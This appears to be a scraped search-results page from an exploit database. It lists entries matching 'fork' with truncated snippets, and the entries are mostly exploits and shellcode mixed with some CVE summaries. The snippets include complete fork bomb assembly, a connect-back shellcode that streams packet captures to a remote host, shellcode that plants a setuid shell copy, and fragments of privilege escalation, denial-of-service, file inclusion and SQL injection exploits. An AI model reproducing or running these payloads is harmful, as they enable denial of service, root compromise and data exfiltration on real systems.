1720 matches found
linux/x86 fork bomb 6 bytes
Exploit for linux/x86 platform in category shellcode =========================== linux/x86 fork bomb 6 bytes =========================== Smallest fork bomb shellcode I could make. ; linux/x86 fork bomb 6 bytes ; email protected ; 2009-12-30 section .text global start start: ; fork mov al, 2 int...
linux/x86 fork bomb 6 bytes
No description provided by source. Smallest fork bomb shellcode I could make. ; linux/x86 fork bomb 6 bytes ; root@thegibson ; 2009-12-30 section .text global start start: ; fork mov al, 2 int 0x80 jmp short start...
linux/x86 fork bomb 6 bytes
linux/x86 fork bomb 6 bytes. Shellcode exploit for linx86 platform Smallest fork bomb shellcode I could make. ; linux/x86 fork bomb 6 bytes ; root@thegibson ; 2009-12-30 section .text global start start: ; fork mov al, 2 int 0x80 jmp short start...
Memory corruption
CarbonCore in Apple Mac OS X 10.4.11 and 10.5.8 allows attackers to execute arbitrary code or cause a denial of service memory corruption and application crash via a file with a crafted resource fork...
CVE-2009-2803
CarbonCore in Apple Mac OS X 10.4.11 and 10.5.8 allows attackers to execute arbitrary code or cause a denial of service memory corruption and application crash via a file with a crafted resource fork...
CVE-2009-2972
in.lpd in the print service in Sun Solaris 8 and 9 allows remote attackers to cause a denial of service memory consumption via unspecified vectors that trigger a "fork/exec bomb."...
PulseAudio setuid - Local Privilege Escalation
PulseAudio setuid - Local Privilege Escalation !/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c include...
Multiple HTTP Server Low Bandwidth Denial of Service #2
No description provided by source. ?php / DOS for the vulnerbility at http://isc.sans.org/diary.html?storyid=6601 I wrote it in PHP because I find it funny to make PHP attack apache... I set it at 200 processes and it kill my test servers pretty quick. have fun kiddiez... greetz: m1m1, t4dp0le,...
Joomla Project Fork 2.0.10 Local File Inclusion
\|/// \ - - // @ @ ----oOOo---oOOo--------------------------- @=Author : ByALBAYX @=Website : WWW.C4TEAM.ORG ---------------Ooooo------------------------- ooooO / / \ \ @=======================================@ @=Script : Joomla Component ComProjectfork @=S.Site : http://joomlapraise.com...
Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation
/ GNU/Linux kernel 2.6.29 ptraceattach local root race condition exploit. ========================================================================== This is a local root exploit for the 2.6.29 ptraceattach race condition that allows a process to gain elevated privileges under certain conditions...
Mandriva Linux Security Advisory : nss_ldap (MDVSA-2008:049)
A race condition in nssldap, when used in applications that use pthread and fork after a call to nssldap, does not properly handle the LDAP connection, which might cause nssldap to return the wrong user data to the wrong process, giving one user access to data belonging to another user, in some...
Linux/x86 - Connect-Back port UDP/54321 - 151 bytes
No description provided by source. / linux/x86 connect-back port UDP/54321 & dup2 & fork & execve /usr/bin/tcpdump -iany -w- "port ! 54321" 151 bytes by XenoMuta | |/ / / |/ / / / | / / / / /|/ / / / / / / / / / / / / // / / / / // / // // / //|// //// //,//,/ xenomuta arroba phreaker punto...
Linux/x86 - /bin/cp /bin/sh /tmp/katy & chmod 4555
No description provided by source. / Linux/x86 /bin/cp /bin/sh /tmp/katy ; chmod 4555 /tmp/sh using fork / include "stdio.h" char shellcode = "\xeb\x5e\x5f\x31\xc0\x88\x47\x07\x88\x47\x0f\x88\x47\x19\x89\x7f" "\x1a\x8d\x77\x08\x89\x77\x1e\x31\xf6\x8d\x77\x10\x89\x77\x22\x89"...
Memory corruption
Unspecified vulnerability in CarbonCore in Apple Mac OS X 10.4.11 and 10.5.6 allows remote attackers to cause a denial of service application termination and execute arbitrary code via a crafted resource fork that triggers memory corruption...
CVE-2009-0020
Unspecified vulnerability in CarbonCore in Apple Mac OS X 10.4.11 and 10.5.6 allows remote attackers to cause a denial of service application termination and execute arbitrary code via a crafted resource fork that triggers memory corruption...
Linux/x86 - fork() + setreuid(0, 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)
Linux/x86 - fork + setreuid0, 0 + execvecp /bin/sh /tmp/sh; chmod 4755 /tmp/sh Shellcode 126 bytes. Shellcode exploit for Linuxx86 platform / linux/x86 shamelessly ripped from one of my unpublished exploits / / fork's, does setreuid0, 0; then execve's: /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755...
Linux Kernel 2.6.x - 'qdisc_run()' Local Denial of Service
/ source: https://www.securityfocus.com/bid/32985/info The Linux kernel is prone to a local denial-of-service vulnerability. Local attackers can exploit this issue to cause a soft lockup, denying service to legitimate users. Versions prior to Linux kernel 2.6.25 are vulnerable. / include include...
Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit
No description provided by source. Clean CMS 1.5 fulltxt.php id Blind SQL Injection Exploit url: http://www.4yoursite.nl/scriptcleancms.php Author: JosS mail: sys-projectathotmaildotcom site: http://hack0wn.com && spanish-hackers.com team: Spanish Hackers Team - SHT This was written for education...
linux/x86 - connect-back port UDP/54321 live packet capture 151 bytes
linux/x86 connect-back port UDP/54321 live packet capture 151 bytes. Shellcode exploit for linx86 platform / linux/x86 connect-back port UDP/54321 & dup2 & fork & execve /usr/bin/tcpdump -iany -w- "port ! 54321" 151 bytes by XenoMuta | |/ / / |/ / / / | / / / / /|/ / / / / / / / / / / / / // / /...
Linux Kernel < 2.4.36.9/2.6.27.5 Unix Sockets Local Kernel Panic Exploit
No description provided by source. include sys/socket.h include sys/un.h include unistd.h include assert.h include err.h include stdlib.h static int ownchildint us int pid; int s2; struct msghdr mh; char crap1024; struct iovec iov; struct cmsghdr c; int fd; int rc; pid = fork; if pid == -1 err1,...